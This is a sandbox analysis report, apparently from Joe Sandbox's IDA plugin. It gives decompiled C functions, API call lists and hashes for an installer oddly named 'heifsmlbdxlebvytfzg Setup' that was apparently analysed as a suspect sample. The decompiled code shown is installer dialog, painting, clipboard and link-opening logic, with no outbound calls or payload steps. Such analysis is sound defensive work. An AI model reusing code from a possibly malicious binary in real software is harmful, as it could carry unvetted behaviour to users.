                          • SendMessageA.USER32 ref: 00405059
                          • SendMessageA.USER32 ref: 00405067
                          • SendMessageA.USER32 ref: 0040507A
                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
                          • ShowWindow.USER32(?,00000008), ref: 004050B0
                          • GetDlgItem.USER32 ref: 004050D1
                          • SendMessageA.USER32 ref: 004050E1
                          • SendMessageA.USER32 ref: 004050FA
                          • SendMessageA.USER32 ref: 00405106
                          • GetDlgItem.USER32 ref: 00404FDE
                            • Part of subcall function 00403E6C: SendMessageA.USER32 ref: 00403E7A
                          • GetDlgItem.USER32 ref: 00405123
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004EF5,00000000), ref: 00405131
                          • CloseHandle.KERNEL32(00000000), ref: 00405138
                          • ShowWindow.USER32(00000000), ref: 0040515C
                          • ShowWindow.USER32(00000000,00000008), ref: 00405161
                          • ShowWindow.USER32(00000008), ref: 004051A8
                          • SendMessageA.USER32 ref: 004051DA
                          • CreatePopupMenu.USER32 ref: 004051EB
                          • AppendMenuA.USER32 ref: 00405200
                          • GetWindowRect.USER32 ref: 00405213
                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
                          • SendMessageA.USER32 ref: 00405272
                          • OpenClipboard.USER32(00000000), ref: 00405282
                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
                          • GlobalLock.KERNEL32 ref: 0040529B
                          • SendMessageA.USER32 ref: 004052AF
                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
                          • SetClipboardData.USER32(00000001,00000000), ref: 004052D2
                          • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004052D8
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                          • String ID: p>u${
                          • API String ID: 590372296-1258388457
                          • Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
                          • Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
                          • Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                          				struct HWND__* _v32;
                          				void* _v84;
                          				void* _v88;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				signed int _t35;
                          				signed int _t37;
                          				signed int _t39;
                          				intOrPtr _t44;
                          				struct HWND__* _t49;
                          				signed int _t67;
                          				struct HWND__* _t73;
                          				signed int _t86;
                          				struct HWND__* _t91;
                          				signed int _t99;
                          				int _t103;
                          				signed int _t115;
                          				signed int _t116;
                          				int _t117;
                          				signed int _t122;
                          				struct HWND__* _t125;
                          				struct HWND__* _t126;
                          				int _t127;
                          				long _t130;
                          				int _t132;
                          				int _t133;
                          				void* _t134;
                          				void* _t142;
                          
                          				_t115 = _a8;
                          				if(_t115 == 0x110 || _t115 == 0x408) {
                          					_t35 = _a12;
                          					_t125 = _a4;
                          					__eflags = _t115 - 0x110;
                          					 *0x42047c = _t35;
                          					if(_t115 == 0x110) {
                          						 *0x423ea8 = _t125;
                          						 *0x420490 = GetDlgItem(_t125, 1);
                          						_t91 = GetDlgItem(_t125, 2);
                          						_push(0xffffffff);
                          						_push(0x1c);
                          						 *0x41f458 = _t91;
                          						E00403E37(_t125);
                          						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                          						 *0x42366c = E0040140B(4);
                          						_t35 = 1;
                          						__eflags = 1;
                          						 *0x42047c = 1;
                          					}
                          					_t122 =  *0x4091bc; // 0xffffffff
                          					_t133 = 0;
                          					_t130 = (_t122 << 6) +  *0x423ec0;
                          					__eflags = _t122;
                          					if(_t122 < 0) {
                          						L34:
                          						E00403E83(0x40b);
                          						while(1) {
                          							_t37 =  *0x42047c;
                          							 *0x4091bc =  *0x4091bc + _t37;
                          							_t130 = _t130 + (_t37 << 6);
                          							_t39 =  *0x4091bc; // 0xffffffff
                          							__eflags = _t39 -  *0x423ec4; // 0x2
                          							if(__eflags == 0) {
                          								E0040140B(1);
                          							}
                          							__eflags =  *0x42366c - _t133; // 0x0
                          							if(__eflags != 0) {
                          								break;
                          							}
                          							_t44 =  *0x423ec4; // 0x2
                          							__eflags =  *0x4091bc - _t44; // 0xffffffff
                          							if(__eflags >= 0) {
                          								break;
                          							}
                          							_t116 =  *(_t130 + 0x14);
                          							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                          							_push( *((intOrPtr*)(_t130 + 0x20)));
                          							_push(0xfffffc19);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x1c)));
                          							_push(0xfffffc1b);
                          							E00403E37(_t125);
                          							_push( *((intOrPtr*)(_t130 + 0x28)));
                          							_push(0xfffffc1a);
                          							E00403E37(_t125);
                          							_t49 = GetDlgItem(_t125, 3);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							_v32 = _t49;
                          							if(__eflags != 0) {
                          								_t116 = _t116 & 0x0000fefd | 0x00000004;
                          								__eflags = _t116;
                          							}
                          							ShowWindow(_t49, _t116 & 0x00000008);
                          							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                          							E00403E59(_t116 & 0x00000002);
                          							_t117 = _t116 & 0x00000004;
                          							EnableWindow( *0x41f458, _t117);
                          							__eflags = _t117 - _t133;
                          							if(_t117 == _t133) {
                          								_push(1);
                          							} else {
                          								_push(_t133);
                          							}
                          							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                          							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                          							__eflags =  *0x423f2c - _t133; // 0x0
                          							if(__eflags == 0) {
                          								_push( *0x420490);
                          							} else {
                          								SendMessageA(_t125, 0x401, 2, _t133);
                          								_push( *0x41f458);
                          							}
                          							E00403E6C();
                          							E00405A85(0x420498, "heifsmlbdxlebvytfzg Setup");
                          							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                          							SetWindowTextA(_t125, 0x420498);
                          							_push(_t133);
                          							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                          							__eflags = _t67;
                          							if(_t67 != 0) {
                          								continue;
                          							} else {
                          								__eflags =  *_t130 - _t133;
                          								if( *_t130 == _t133) {
                          									continue;
                          								}
                          								__eflags =  *(_t130 + 4) - 5;
                          								if( *(_t130 + 4) != 5) {
                          									DestroyWindow( *0x423678);
                          									 *0x41fc68 = _t130;
                          									__eflags =  *_t130 - _t133;
                          									if( *_t130 <= _t133) {
                          										goto L58;
                          									}
                          									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                          									__eflags = _t73 - _t133;
                          									 *0x423678 = _t73;
                          									if(_t73 == _t133) {
                          										goto L58;
                          									}
                          									_push( *((intOrPtr*)(_t130 + 0x2c)));
                          									_push(6);
                          									E00403E37(_t73);
                          									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                          									ScreenToClient(_t125, _t134 + 0x10);
                          									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                          									_push(_t133);
                          									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                          									__eflags =  *0x42366c - _t133; // 0x0
                          									if(__eflags != 0) {
                          										goto L61;
                          									}
                          									ShowWindow( *0x423678, 8);
                          									E00403E83(0x405);
                          									goto L58;
                          								}
                          								__eflags =  *0x423f2c - _t133; // 0x0
                          								if(__eflags != 0) {
                          									goto L61;
                          								}
                          								__eflags =  *0x423f20 - _t133; // 0x0
                          								if(__eflags != 0) {
                          									continue;
                          								}
                          								goto L61;
                          							}
                          						}
                          						DestroyWindow( *0x423678);
                          						 *0x423ea8 = _t133;
                          						EndDialog(_t125,  *0x41f860);
                          						goto L58;
                          					} else {
                          						__eflags = _t35 - 1;
                          						if(_t35 != 1) {
                          							L33:
                          							__eflags =  *_t130 - _t133;
                          							if( *_t130 == _t133) {
                          								goto L61;
                          							}
                          							goto L34;
                          						}
                          						_push(0);
                          						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                          						__eflags = _t86;
                          						if(_t86 == 0) {
                          							goto L33;
                          						}
                          						SendMessageA( *0x423678, 0x40f, 0, 1);
                          						__eflags =  *0x42366c - _t133; // 0x0
                          						return 0 | __eflags == 0x00000000;
                          					}
                          				} else {
                          					_t125 = _a4;
                          					_t133 = 0;
                          					if(_t115 == 0x47) {
                          						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                          					}
                          					if(_t115 == 5) {
                          						asm("sbb eax, eax");
                          						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                          					}
                          					if(_t115 != 0x40d) {
                          						__eflags = _t115 - 0x11;
                          						if(_t115 != 0x11) {
                          							__eflags = _t115 - 0x111;
                          							if(_t115 != 0x111) {
                          								L26:
                          								return E00403E9E(_t115, _a12, _a16);
                          							}
                          							_t132 = _a12 & 0x0000ffff;
                          							_t126 = GetDlgItem(_t125, _t132);
                          							__eflags = _t126 - _t133;
                          							if(_t126 == _t133) {
                          								L13:
                          								__eflags = _t132 - 1;
                          								if(_t132 != 1) {
                          									__eflags = _t132 - 3;
                          									if(_t132 != 3) {
                          										_t127 = 2;
                          										__eflags = _t132 - _t127;
                          										if(_t132 != _t127) {
                          											L25:
                          											SendMessageA( *0x423678, 0x111, _a12, _a16);
                          											goto L26;
                          										}
                          										__eflags =  *0x423f2c - _t133; // 0x0
                          										if(__eflags == 0) {
                          											_t99 = E0040140B(3);
                          											__eflags = _t99;
                          											if(_t99 != 0) {
                          												goto L26;
                          											}
                          											 *0x41f860 = 1;
                          											L21:
                          											_push(0x78);
                          											L22:
                          											E00403E10();
                          											goto L26;
                          										}
                          										E0040140B(_t127);
                          										 *0x41f860 = _t127;
                          										goto L21;
                          									}
                          									__eflags =  *0x4091bc - _t133; // 0xffffffff
                          									if(__eflags <= 0) {
                          										goto L25;
                          									}
                          									_push(0xffffffff);
                          									goto L22;
                          								}
                          								_push(_t132);
                          								goto L22;
                          							}
                          							SendMessageA(_t126, 0xf3, _t133, _t133);
                          							_t103 = IsWindowEnabled(_t126);
                          							__eflags = _t103;
                          							if(_t103 == 0) {
                          								goto L61;
                          							}
                          							goto L13;
                          						}
                          						SetWindowLongA(_t125, _t133, _t133);
                          						return 1;
                          					} else {
                          						DestroyWindow( *0x423678);
                          						 *0x423678 = _a12;
                          						L58:
                          						if( *0x421498 == _t133) {
                          							_t142 =  *0x423678 - _t133; // 0x0
                          							if(_t142 != 0) {
                          								ShowWindow(_t125, 0xa);
                          								 *0x421498 = 1;
                          							}
                          						}
                          						L61:
                          						return 0;
                          					}
                          				}
                          			}
































                          0x0040396d
                          0x00403976
                          0x00403ab7
                          0x00403abb
                          0x00403abf
                          0x00403ac1
                          0x00403ac6
                          0x00403ad1
                          0x00403adc
                          0x00403ae1
                          0x00403ae3
                          0x00403ae5
                          0x00403ae8
                          0x00403aed
                          0x00403afb
                          0x00403b08
                          0x00403b0f
                          0x00403b0f
                          0x00403b10
                          0x00403b10
                          0x00403b15
                          0x00403b1b
                          0x00403b22
                          0x00403b28
                          0x00403b2a
                          0x00403b6a
                          0x00403b6f
                          0x00403b74
                          0x00403b74
                          0x00403b79
                          0x00403b82
                          0x00403b84
                          0x00403b89
                          0x00403b8f
                          0x00403b93
                          0x00403b93
                          0x00403b98
                          0x00403b9e
                          0x00000000
                          0x00000000
                          0x00403ba4
                          0x00403ba9
                          0x00403baf
                          0x00000000
                          0x00000000
                          0x00403bb8
                          0x00403bc0
                          0x00403bc5
                          0x00403bc8
                          0x00403bce
                          0x00403bd3
                          0x00403bd6
                          0x00403bdc
                          0x00403be1
                          0x00403be4
                          0x00403bea
                          0x00403bf2
                          0x00403bf8
                          0x00403bfe
                          0x00403c02
                          0x00403c09
                          0x00403c09
                          0x00403c09
                          0x00403c13
                          0x00403c25
                          0x00403c31
                          0x00403c36
                          0x00403c40
                          0x00403c46
                          0x00403c48
                          0x00403c4d
                          0x00403c4a
                          0x00403c4a
                          0x00403c4a
                          0x00403c5d
                          0x00403c75
                          0x00403c77
                          0x00403c7d
                          0x00403c92
                          0x00403c7f
                          0x00403c88
                          0x00403c8a
                          0x00403c8a
                          0x00403c98
                          0x00403ca8
                          0x00403cb9
                          0x00403cc0
                          0x00403cc6
                          0x00403cca
                          0x00403ccf
                          0x00403cd1
                          0x00000000
                          0x00403cd7
                          0x00403cd7
                          0x00403cd9
                          0x00000000
                          0x00000000
                          0x00403cdf
                          0x00403ce3
                          0x00403d08
                          0x00403d0e
                          0x00403d14
                          0x00403d16
                          0x00000000
                          0x00000000
                          0x00403d3c
                          0x00403d42
                          0x00403d44
                          0x00403d49
                          0x00000000
                          0x00000000
                          0x00403d4f
                          0x00403d52
                          0x00403d55
                          0x00403d6c
                          0x00403d78
                          0x00403d91
                          0x00403d97
                          0x00403d9b
                          0x00403da0
                          0x00403da6
                          0x00000000
                          0x00000000
                          0x00403db0
                          0x00403dbb
                          0x00000000
                          0x00403dbb
                          0x00403ce5
                          0x00403ceb
                          0x00000000
                          0x00000000
                          0x00403cf1
                          0x00403cf7
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403cfd
                          0x00403cd1
                          0x00403dc8
                          0x00403dd4
                          0x00403ddb
                          0x00000000
                          0x00403b2c
                          0x00403b2c
                          0x00403b2f
                          0x00403b62
                          0x00403b62
                          0x00403b64
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403b64
                          0x00403b31
                          0x00403b35
                          0x00403b3a
                          0x00403b3c
                          0x00000000
                          0x00000000
                          0x00403b4c
                          0x00403b54
                          0x00000000
                          0x00403b5a
                          0x00403988
                          0x00403988
                          0x0040398c
                          0x00403991
                          0x004039a0
                          0x004039a0
                          0x004039a9
                          0x004039b2
                          0x004039bd
                          0x004039bd
                          0x004039c9
                          0x004039e5
                          0x004039e8
                          0x004039fb
                          0x00403a01
                          0x00403aa4
                          0x00000000
                          0x00403aad
                          0x00403a07
                          0x00403a14
                          0x00403a16
                          0x00403a18
                          0x00403a37
                          0x00403a37
                          0x00403a3a
                          0x00403a3f
                          0x00403a42
                          0x00403a52
                          0x00403a53
                          0x00403a55
                          0x00403a8b
                          0x00403a9e
                          0x00000000
                          0x00403a9e
                          0x00403a57
                          0x00403a5d
                          0x00403a76
                          0x00403a7b
                          0x00403a7d
                          0x00000000
                          0x00000000
                          0x00403a7f
                          0x00403a6b
                          0x00403a6b
                          0x00403a6d
                          0x00403a6d
                          0x00000000
                          0x00403a6d
                          0x00403a60
                          0x00403a65
                          0x00000000
                          0x00403a65
                          0x00403a44
                          0x00403a4a
                          0x00000000
                          0x00000000
                          0x00403a4c
                          0x00000000
                          0x00403a4c
                          0x00403a3c
                          0x00000000
                          0x00403a3c
                          0x00403a22
                          0x00403a29
                          0x00403a2f
                          0x00403a31
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403a31
                          0x004039ed
                          0x00000000
                          0x004039cb
                          0x004039d1
                          0x004039db
                          0x00403de1
                          0x00403de7
                          0x00403de9
                          0x00403def
                          0x00403df4
                          0x00403dfa
                          0x00403dfa
                          0x00403def
                          0x00403e04
                          0x00000000
                          0x00403e04
                          0x004039c9

                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                          • ShowWindow.USER32(?), ref: 004039BD
                          • DestroyWindow.USER32 ref: 004039D1
                          • SetWindowLongA.USER32 ref: 004039ED
                          • GetDlgItem.USER32 ref: 00403A0E
                          • SendMessageA.USER32 ref: 00403A22
                          • IsWindowEnabled.USER32(00000000), ref: 00403A29
                          • GetDlgItem.USER32 ref: 00403AD7
                          • GetDlgItem.USER32 ref: 00403AE1
                          • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                          • SendMessageA.USER32 ref: 00403B4C
                          • GetDlgItem.USER32 ref: 00403BF2
                          • ShowWindow.USER32(00000000,?), ref: 00403C13
                          • EnableWindow.USER32(?,?), ref: 00403C25
                          • EnableWindow.USER32(?,?), ref: 00403C40
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                          • EnableMenuItem.USER32 ref: 00403C5D
                          • SendMessageA.USER32 ref: 00403C75
                          • SendMessageA.USER32 ref: 00403C88
                          • lstrlenA.KERNEL32(00420498,?,00420498,heifsmlbdxlebvytfzg Setup), ref: 00403CB1
                          • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                          • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                          Strings
                          • heifsmlbdxlebvytfzg Setup, xrefs: 00403CA2
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID: heifsmlbdxlebvytfzg Setup
                          • API String ID: 184305955-4100266025
                          • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                          • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                          • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                          				char _v8;
                          				signed int _v12;
                          				void* _v16;
                          				struct HWND__* _t52;
                          				intOrPtr _t71;
                          				intOrPtr _t85;
                          				long _t86;
                          				int _t98;
                          				struct HWND__* _t99;
                          				signed int _t100;
                          				intOrPtr _t103;
                          				intOrPtr _t107;
                          				intOrPtr _t109;
                          				int _t110;
                          				signed int* _t112;
                          				signed int _t113;
                          				char* _t114;
                          				CHAR* _t115;
                          
                          				if(_a8 != 0x110) {
                          					if(_a8 != 0x111) {
                          						L11:
                          						if(_a8 != 0x4e) {
                          							if(_a8 == 0x40b) {
                          								 *0x420478 =  *0x420478 + 1;
                          							}
                          							L25:
                          							_t110 = _a16;
                          							L26:
                          							return E00403E9E(_a8, _a12, _t110);
                          						}
                          						_t52 = GetDlgItem(_a4, 0x3e8);
                          						_t110 = _a16;
                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                          							_v12 = _t100;
                          							_v16 = _t109;
                          							_v8 = 0x422e40;
                          							if(_t100 - _t109 < 0x800) {
                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                          								SetCursor(LoadCursorA(0, 0x7f02));
                          								_t40 =  &_v8; // 0x422e40
                          								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                          								SetCursor(LoadCursorA(0, 0x7f00));
                          								_t110 = _a16;
                          							}
                          						}
                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                          							goto L26;
                          						} else {
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                          								SendMessageA( *0x423ea8, 0x111, 1, 0);
                          							}
                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                          								SendMessageA( *0x423ea8, 0x10, 0, 0);
                          							}
                          							return 1;
                          						}
                          					}
                          					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                          						goto L25;
                          					} else {
                          						_t103 =  *0x41fc68; // 0x0
                          						_t25 = _t103 + 0x14; // 0x14
                          						_t112 = _t25;
                          						if(( *_t112 & 0x00000020) == 0) {
                          							goto L25;
                          						}
                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                          						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                          						E0040420A();
                          						goto L11;
                          					}
                          				}
                          				_t98 = _a16;
                          				_t113 =  *(_t98 + 0x30);
                          				if(_t113 < 0) {
                          					_t107 =  *0x42367c; // 0x759a19
                          					_t113 =  *(_t107 - 4 + _t113 * 4);
                          				}
                          				_t71 =  *0x423ed8; // 0x7583dc
                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                          				_t114 = _t113 + _t71;
                          				_push(0x22);
                          				_a16 =  *_t114;
                          				_v12 = _v12 & 0x00000000;
                          				_t115 = _t114 + 1;
                          				_v16 = _t115;
                          				_v8 = E00403F4B;
                          				E00403E37(_a4);
                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                          				_push(0x23);
                          				E00403E37(_a4);
                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                          				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                          				_t99 = GetDlgItem(_a4, 0x3e8);
                          				E00403E6C(_t99);
                          				SendMessageA(_t99, 0x45b, 1, 0);
                          				_t85 =  *0x423eb0; // 0x753e70
                          				_t86 =  *(_t85 + 0x68);
                          				if(_t86 < 0) {
                          					_t86 = GetSysColor( ~_t86);
                          				}
                          				SendMessageA(_t99, 0x443, 0, _t86);
                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                          				 *0x41f45c =  *0x41f45c & 0x00000000;
                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                          				 *0x420478 =  *0x420478 & 0x00000000;
                          				return 0;
                          			}





















                          0x00403f8f
                          0x004040b5
                          0x00404111
                          0x00404115
                          0x004041ec
                          0x004041ee
                          0x004041ee
                          0x004041f4
                          0x004041f4
                          0x004041f7
                          0x00000000
                          0x004041fe
                          0x00404123
                          0x00404125
                          0x0040412f
                          0x0040413a
                          0x0040413d
                          0x00404140
                          0x0040414b
                          0x0040414e
                          0x00404155
                          0x00404163
                          0x0040417b
                          0x00404183
                          0x0040418e
                          0x0040419e
                          0x004041a0
                          0x004041a0
                          0x00404155
                          0x004041aa
                          0x00000000
                          0x004041b5
                          0x004041b9
                          0x004041ca
                          0x004041ca
                          0x004041d0
                          0x004041de
                          0x004041de
                          0x00000000
                          0x004041e2
                          0x004041aa
                          0x004040c0
                          0x00000000
                          0x004040d4
                          0x004040d4
                          0x004040da
                          0x004040da
                          0x004040e0
                          0x00000000
                          0x00000000
                          0x00404105
                          0x00404107
                          0x0040410c
                          0x00000000
                          0x0040410c
                          0x004040c0
                          0x00403f95
                          0x00403f98
                          0x00403f9d
                          0x00403f9f
                          0x00403fae
                          0x00403fae
                          0x00403fb0
                          0x00403fb5
                          0x00403fb8
                          0x00403fba
                          0x00403fbf
                          0x00403fc8
                          0x00403fce
                          0x00403fda
                          0x00403fdd
                          0x00403fe6
                          0x00403feb
                          0x00403fee
                          0x00403ff3
                          0x0040400a
                          0x00404011
                          0x00404024
                          0x00404027
                          0x0040403c
                          0x0040403e
                          0x00404043
                          0x00404048
                          0x0040404d
                          0x0040404d
                          0x0040405c
                          0x0040406b
                          0x0040406d
                          0x00404083
                          0x00404092
                          0x00404094
                          0x00000000

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: @.B$N$open$p>u
                          • API String ID: 3615053054-3984196603
                          • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                          • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                          • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                          				struct tagLOGBRUSH _v16;
                          				struct tagRECT _v32;
                          				struct tagPAINTSTRUCT _v96;
                          				struct HDC__* _t70;
                          				struct HBRUSH__* _t87;
                          				struct HFONT__* _t94;
                          				long _t102;
                          				intOrPtr _t115;
                          				signed int _t126;
                          				struct HDC__* _t128;
                          				intOrPtr _t130;
                          
                          				if(_a8 == 0xf) {
                          					_t130 =  *0x423eb0; // 0x753e70
                          					_t70 = BeginPaint(_a4,  &_v96);
                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                          					_a8 = _t70;
                          					GetClientRect(_a4,  &_v32);
                          					_t126 = _v32.bottom;
                          					_v32.bottom = _v32.bottom & 0x00000000;
                          					while(_v32.top < _t126) {
                          						_a12 = _t126 - _v32.top;
                          						asm("cdq");
                          						asm("cdq");
                          						asm("cdq");
                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                          						_t87 = CreateBrushIndirect( &_v16);
                          						_v32.bottom = _v32.bottom + 4;
                          						_a16 = _t87;
                          						FillRect(_a8,  &_v32, _t87);
                          						DeleteObject(_a16);
                          						_v32.top = _v32.top + 4;
                          					}
                          					if( *(_t130 + 0x58) != 0xffffffff) {
                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                          						_a16 = _t94;
                          						if(_t94 != 0) {
                          							_t128 = _a8;
                          							_v32.left = 0x10;
                          							_v32.top = 8;
                          							SetBkMode(_t128, 1);
                          							SetTextColor(_t128,  *(_t130 + 0x58));
                          							_a8 = SelectObject(_t128, _a16);
                          							DrawTextA(_t128, "heifsmlbdxlebvytfzg Setup", 0xffffffff,  &_v32, 0x820);
                          							SelectObject(_t128, _a8);
                          							DeleteObject(_a16);
                          						}
                          					}
                          					EndPaint(_a4,  &_v96);
                          					return 0;
                          				}
                          				_t102 = _a16;
                          				if(_a8 == 0x46) {
                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                          					_t115 =  *0x423ea8; // 0x0
                          					 *((intOrPtr*)(_t102 + 4)) = _t115;
                          				}
                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                          			}














                          0x0040100a
                          0x00401039
                          0x00401047
                          0x0040104d
                          0x00401051
                          0x0040105b
                          0x00401061
                          0x00401064
                          0x004010f3
                          0x00401089
                          0x0040108c
                          0x004010a6
                          0x004010bd
                          0x004010cc
                          0x004010cf
                          0x004010d5
                          0x004010d9
                          0x004010e4
